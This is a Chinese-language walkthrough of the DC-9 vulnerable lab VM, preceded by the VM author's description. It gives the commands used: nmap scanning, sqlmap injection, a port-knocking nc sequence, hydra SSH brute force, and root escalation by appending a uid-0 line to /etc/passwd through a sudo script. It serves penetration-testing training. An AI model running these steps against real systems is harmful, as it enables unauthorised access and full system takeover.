靶机信息

DESCRIPTION
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

TECHNICAL INFORMATION
DC-9 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

DC-9 has been tested successfully on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CREDITS
A big thanks goes out to the members of @m0tl3ycr3w.

CONTACT
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

信息收集

部署完靶机后扫描nmap获得ip地址,一个是kali的ip,另一个就是靶机的ip,之后再扫描主机的开放端口

#ping扫描网段内的主机
nmap -sP 10.0.0.0/24
#扫描主机端口
nmap -sV -p- 10.0.0.25

QQ截图20210309095043.png

访问80端口

QQ截图20210309095122.png

访问中发现搜索表单存在sql注入漏洞,保存bp的报文用sqlmap尝试注入成功

QQ截图20210309100643.png

sqlmap -r './dc6/bp.txt' --dbs

QQ截图20210309100817.png

flag1

sqlmap获取到密码,并爆破出明文,还获取到一份名单和密码

QQ截图20210309102930.png

QQ截图20210309103024.png

登录后发现文件包含不存在可能存在文件包含漏洞

QQ截图20210309103054.png

发现文件包含漏洞,尝试包含日志发现找不到日志

QQ截图20210309103729.png

之后查资料发现,有端口敲门的保护机制,找到配置文件,需要按顺序访问3个端口才能登陆ssh

QQ截图20210309104718.png

nc 10.0.0.25 7469
nc 10.0.0.25 8475
nc 10.0.0.25 9842

QQ截图20210311185702.png

尝试使用hydra对之前获得的用户名和密码进行爆破

hydra -L user.dic -P password.dic -o ssh.txt 10.0.0.25 ssh

QQ截图20210311190634.png

登录后发现janitor用户下有个密码文件

QQ截图20210311191000.png

重新进行爆破后获得新的用户

hydra -L user.dic -P password.dic -o ssh.txt 10.0.0.25 ssh

QQ截图20210311191315.png

登录以后发现可以以root权限执行脚本

QQ截图20210311191445.png

在前几级目录找到了脚本的原文

QQ截图20210311191759.png

可以利用脚本将用户信息写入/etc/passwd实现提权

perl -le 'print crypt("123456","salt")'
echo "1997sty:sahL5d5V.UWtI:0:0:User_like_root:/root:/bin/bash" >> /tmp/passwd
cd /opt/devstuff/dist/test
sudo ./test /tmp/passwd /etc/passwd

QQ截图20210311192250.png